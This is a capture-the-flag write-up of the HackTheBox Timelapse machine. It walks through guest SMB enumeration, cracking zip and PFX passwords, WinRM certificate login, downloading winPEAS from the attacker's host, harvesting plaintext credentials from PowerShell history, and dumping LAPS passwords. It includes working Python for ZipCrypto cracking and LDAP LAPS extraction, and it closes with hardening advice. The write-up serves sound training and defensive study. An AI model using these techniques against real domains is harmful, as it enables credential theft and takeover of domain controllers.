
Writeup - Timelapse (HTB)

Author: d3vyce

This is a writeup for the Timelapse machine from the HackTheBox site.

Enumeration

First, let's scan the target with nmap:

nmap -sV -T4 -Pn 10.129.188.205

Many TCP ports are open, as expected for a Windows domain controller. The two services the rest of this writeup relies on are:

  • 445/tcp : SMB (file shares)
  • 5986/tcp : WinRM over HTTPS

Exploit

First I start by listing the SMB shares with the guest account:

enum4linux -a -u "guest" -p "" 10.129.188.205

The share named Shares is readable by the guest account, so let's see what it contains.

It holds two folders, and one of them contains a file named winrm_backup.zip. I download it and try to unzip it, but the archive is password-protected. Let's crack that password with john. First I extract a crackable hash from the archive with zip2john:

zip2john winrm_backup.zip > hash

Then I run john against the hash with the rockyou wordlist:
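What john does in that step, as an added example (not code from the writeup): entries protected with ZipCrypto, the traditional PKZIP cipher (zip2john prints them as $pkzip$ hashes), let a candidate password be rejected after decrypting only the 12-byte encryption header, whose last byte must equal the high byte of the entry's CRC-32 (or of the modification time when bit 3 of the general-purpose flags is set). That is why such archives crack so quickly. The cipher below follows APPNOTE.TXT section 6.1; the wordlist and the encrypted "entry" are constructed inline and seeded with the password this step recovers. WinZip AES entries ($zip2$) use PBKDF2 instead and are far slower to attack.

```python
"""Dictionary attack on a ZipCrypto (traditional PKZIP) encrypted entry.

Added example, not code from the writeup. Implements the PKZIP stream cipher
(APPNOTE.TXT 6.1) and the check-byte rejection that zip2john/john rely on.
The wordlist and the encrypted "entry" are constructed inline; against a real
archive the encrypted bytes and CRC-32 come from the local file header.
"""
import os
import zlib
from typing import Iterable, Optional, Tuple

# Standard CRC-32 byte table (polynomial 0xEDB88320), the one PKZIP uses.
_CRC_TAB = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TAB.append(_c)


def _crc32_byte(crc: int, b: int) -> int:
    return _CRC_TAB[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCryptoKeys:
    """The three 32-bit cipher keys, seeded by feeding the password through update()."""

    def __init__(self, password: bytes) -> None:
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self.update(b)

    def update(self, plain_byte: int) -> None:
        self.k0 = _crc32_byte(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_byte(self.k2, self.k1 >> 24)

    def stream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self.stream_byte()
            self.update(p)  # the keys advance on the plaintext byte
            out.append(p)
        return bytes(out)

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self.stream_byte())
            self.update(p)
        return bytes(out)


def encrypt_entry(password: bytes, plaintext: bytes,
                  header_random: Optional[bytes] = None) -> Tuple[bytes, int]:
    """What a zip writer stores for a 'stored' (uncompressed) entry: a 12-byte header
    whose last byte is the high byte of the CRC-32, then the data, all encrypted."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = (header_random or os.urandom(11))[:11] + bytes([crc >> 24])
    return ZipCryptoKeys(password).encrypt(header + plaintext), crc


def check_byte_matches(password: bytes, blob: bytes, crc: int) -> bool:
    """Fast reject: decrypt only the header and compare its check byte.
    A wrong password survives this with probability 1/256, so hits need verifying."""
    header = ZipCryptoKeys(password).decrypt(blob[:12])
    return header[11] == (crc >> 24)


def crack(candidates: Iterable[bytes], blob: bytes, crc: int) -> Optional[bytes]:
    """Dictionary attack: cheap check byte first, full decrypt plus CRC-32 only on survivors.
    (For a deflated entry the survivor would be inflated before the CRC check.)"""
    for pw in candidates:
        if not check_byte_matches(pw, blob, crc):
            continue
        data = ZipCryptoKeys(pw).decrypt(blob)[12:]
        if zlib.crc32(data) & 0xFFFFFFFF == crc:
            return pw
    return None


# Constructed sample entry, protected with the password this step recovers.
SAMPLE_PLAINTEXT = b"constructed stand-in for legacyy_dev_auth.pfx"
SAMPLE_BLOB, SAMPLE_CRC = encrypt_entry(b"supremelagacy", SAMPLE_PLAINTEXT,
                                        header_random=bytes(range(11)))
# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = [b"123456", b"password", b"legacy", b"thuglegacy", b"supremelagacy", b"timelapse"]

if __name__ == "__main__":
    print("password:", crack(WORDLIST, SAMPLE_BLOB, SAMPLE_CRC))
```

The two-stage loop is the whole trick: the header check costs twelve cipher steps per candidate, and the full decrypt plus CRC-32 only runs for the roughly one in 256 candidates that pass it, which also rules out false positives.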

John quickly finds the password supremelagacy, and the archive can be unpacked. It contains a file with the .pfx extension: a PKCS#12 container, which Windows uses to bundle a certificate together with its private key. Both can be extracted from it with openssl (cf. ibm.com); -nodes writes the key unencrypted so that no PEM pass phrase is asked for and evil-winrm can load it directly:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out prv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

Problem: the PFX itself is also password-protected, and the password found for the zip does not work for it. Once again john can brute-force it. pfx2john extracts the container's integrity MAC, which is keyed by that password, so john can test candidates against it:

pfx2john legacyy_dev_auth.pfx > hashbis

Then I run john against this hash with the same wordlist:

John finds the password thuglegacy, and I can now extract the private key and the certificate. I then try to authenticate to WinRM with these two files using evil-winrm (-S selects the HTTPS listener on port 5986; -c and -k supply the certificate and key, so no username or password is needed):

evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key

I now have a shell as the legacyy user and can read the first flag.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
6a29afecacdabd66d286759e1f1379ff

Privilege escalation

For privilege escalation I start by uploading winPEAS (evil-winrm's built-in upload command would also do) and running it:

powershell "Invoke-WebRequest -UseBasicParsing http://10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe"
./winPEASx64.exe

Among its findings, winPEAS reports a PowerShell command history file on the machine (PSReadLine records every interactive command in ConsoleHost_history.txt):

I pull it back with evil-winrm's download command:

download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Its contents:

whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

The file hands me a username and its password in clear text: someone built a PSCredential for svc_deploy with ConvertTo-SecureString -AsPlainText, and the literal password was saved along with the command.
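The check a defender would run for this class of leak, as an added example that is not part of the writeup: a scanner for credential material in ConsoleHost_history.txt files, with a redaction helper so a file can be shared safely. The history it runs on is constructed to resemble the one found here; the password and share in it are made up, and the scan is limited to the patterns listed.

```python
"""Scan PSReadLine command history for credential material.

Added example, not from the writeup. The history lines are constructed to
resemble ConsoleHost_history.txt on this box; the secrets in them are made up.
"""
import os
import re
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# Per-user location PSReadLine writes to on Windows.
HISTORY_RELATIVE = Path("AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt")

# Each pattern names the groups it captures: 'secret' and/or 'user'.
PATTERNS = {
    # A SecureString built from a literal is only a leak with -AsPlainText; without it
    # the argument is an encrypted standard string, not the password.
    "securestring-plaintext": re.compile(
        r"ConvertTo-SecureString\s+(?:-String\s+)?(['\"])(?P<secret>.+?)\1(?=.*-AsPlainText)", re.I),
    "pscredential-user": re.compile(r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I),
    "net-use": re.compile(r"\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>\S+)", re.I),
    # Literal values only: a value starting with $ is a variable, not the secret.
    "password-parameter": re.compile(
        r"-(?:Password|Pwd|Secret|Token)\s+['\"]?(?P<secret>[^'\"\s$][^'\"\s]*)", re.I),
}

Finding = Tuple[int, str, Dict[str, str]]  # (line number, pattern name, captured groups)


def scan_history(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                findings.append((line_no, kind, {k: v for k, v in m.groupdict().items() if v}))
    return findings


def redact(text: str) -> str:
    """Blank every captured secret so the file can be attached to a ticket."""
    for _, _, caps in scan_history(text):
        if "secret" in caps:
            text = text.replace(caps["secret"], "<REDACTED>")
    return text


def iter_history_files(users_root: Path = Path(os.environ.get("SystemDrive", "C:"), "Users")) -> Iterator[Path]:
    """Every profile's history file on a Windows host (yields nothing elsewhere)."""
    for profile in users_root.glob("*"):
        candidate = profile / HISTORY_RELATIVE
        if candidate.is_file():
            yield candidate


# Constructed history, modelled on the one found on the box.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Constructed-Pw-1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net use \\fs01\backups /user:CORP\backup_svc Constructed-Pw-2
$enc = ConvertTo-SecureString $blob
get-aduser -filter * -properties *
"""

if __name__ == "__main__":
    for line_no, kind, caps in scan_history(SAMPLE_HISTORY):
        print(line_no, kind, caps)
    for path in iter_history_files():
        print(path, len(scan_history(path.read_text(errors="replace"))), "finding(s)")
```

PSReadLine 2.1 and later keeps lines containing password, asplaintext, token, apikey or secretkey out of the history file by default, but older versions, like the one that produced this file, save everything; Set-PSReadLineOption -HistorySaveStyle SaveNothing turns the file off entirely. The ConvertTo-SecureString pattern deliberately requires -AsPlainText: without it the argument is an encrypted standard string, and flagging it would only produce noise.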

winPEAS also reports that the svc_deploy user has the right to read the LAPS password attribute of computer objects.

The Local Administrator Password Solution (LAPS) manages the local Administrator password of domain-joined computers: each machine sets a random password and stores it, together with its expiry time, on its own computer object in Active Directory (AD). Those attributes are protected by an ACL, so only principals that were granted the right can read the password or request a reset.
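What a LAPS dump actually is, as an added example and not the LAPSDumper script used below: bind to the domain controller over LDAP as a domain user and read ms-Mcs-AdmPwd (and its FILETIME expiry, ms-Mcs-AdmPwdExpirationTime) from the computer objects that user is allowed to see. The ldap3 library is assumed for the network part and imported lazily so the parsing helpers run offline; the search result below is constructed and its password is made up.

```python
"""Read LAPS-managed local Administrator passwords over LDAP, as laps.py does.

Added example, not the LAPSDumper script from the writeup. ldap3 is assumed
for the network part and imported lazily, so the parsing helpers run offline.
The sample entry is constructed and its password is made up.
"""
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Union

# Legacy LAPS attributes (Windows LAPS uses msLAPS-Password / msLAPS-PasswordExpirationTime).
LAPS_PASSWORD_ATTR = "ms-Mcs-AdmPwd"
LAPS_EXPIRY_ATTR = "ms-Mcs-AdmPwdExpirationTime"
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def base_dn(domain: str) -> str:
    """timelapse.htb -> DC=timelapse,DC=htb"""
    return ",".join(f"DC={part}" for part in domain.split("."))


def laps_filter(computer: Optional[str] = None) -> str:
    """AD evaluates the filter with the caller's rights, so (ms-Mcs-AdmPwd=*) only matches
    computers whose password this account may read. `computer` is a plain host name
    (no LDAP escaping is done here)."""
    name = f"(sAMAccountName={computer}$)" if computer else ""
    return f"(&(objectClass=computer){name}({LAPS_PASSWORD_ATTR}=*))"


def filetime_to_datetime(ft: Union[int, str]) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=int(ft) // 10)


def parse_laps_entry(attrs: Dict[str, object]) -> Dict[str, object]:
    """Normalise one search result; ldap3 hands back single-item lists per attribute."""
    def one(name: str):
        v = attrs.get(name)
        if isinstance(v, list):
            v = v[0] if v else None
        return v
    sam = one("sAMAccountName")
    expiry = one(LAPS_EXPIRY_ATTR)
    return {
        "computer": str(sam).rstrip("$") if sam else None,
        "password": one(LAPS_PASSWORD_ATTR),
        "expires": filetime_to_datetime(expiry) if expiry not in (None, "", 0) else None,
    }


def dump_laps(dc: str, domain: str, user: str, password: str, use_ssl: bool = False) -> List[Dict[str, object]]:
    """Bind as a domain user (NTLM) and return every LAPS password it is allowed to read.
    An empty list after a successful bind means 'no read right', not 'no LAPS'."""
    import ldap3  # lazy: only this function needs the library
    server = ldap3.Server(dc, use_ssl=use_ssl, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=f"{domain.split('.')[0]}\\{user}", password=password,
                            authentication=ldap3.NTLM, auto_bind=True)
    conn.search(base_dn(domain), laps_filter(),
                attributes=["sAMAccountName", LAPS_PASSWORD_ATTR, LAPS_EXPIRY_ATTR])
    results = [parse_laps_entry(e.entry_attributes_as_dict) for e in conn.entries]
    conn.unbind()
    return results


# Constructed search result, shaped like what ldap3 returns for DC01.
SAMPLE_ENTRY = {
    "sAMAccountName": ["DC01$"],
    LAPS_PASSWORD_ATTR: ["Constructed-LAPS-Pw"],
    LAPS_EXPIRY_ATTR: [116444736000000000],  # FILETIME of 1970-01-01T00:00:00Z
}

if __name__ == "__main__":
    print(parse_laps_entry(SAMPLE_ENTRY))
    # Live use would look like (credentials assumed, taken from the history file):
    # print(dump_laps("10.129.188.205", "timelapse.htb", "svc_deploy", "<password>"))
```

Because AD applies the caller's read rights while evaluating the filter, the same query run as a user without the LAPS right simply returns no entries; Find-AdmPwdExtendedRights from the AdmPwd.PS module lists, per OU, which principals hold that right, which is the check to run when auditing a delegation like the one svc_deploy has here.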

So I try to read it with the LAPSDumper script (laps.py), authenticating as svc_deploy with the password from the history file:

┌──(d3vyce㉿kali)-[~/Documents]
└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
DC01$:J3V}8QBsB4Q6+jgveai$7}}M

The script returns the LAPS-managed local Administrator password of DC01. Since DC01 is the domain controller, that account is the domain's built-in Administrator, so I can connect with it over WinRM:

evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'

I now have a shell as Administrator and I can retrieve the last flag.

*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
09cec1f63345aa18fcf4bd05b9be6714

Recommendations

To fix this host, several things would have to change:

  • Do not let unauthenticated (guest) users read SMB shares that hold sensitive files such as backups
  • Do not protect archives and certificates with weak, dictionary-based passwords
  • Do not pass plaintext passwords on the command line: PSReadLine records every interactive command in ConsoleHost_history.txt
  • Grant the LAPS read right only to the administrators who need it, not to service accounts
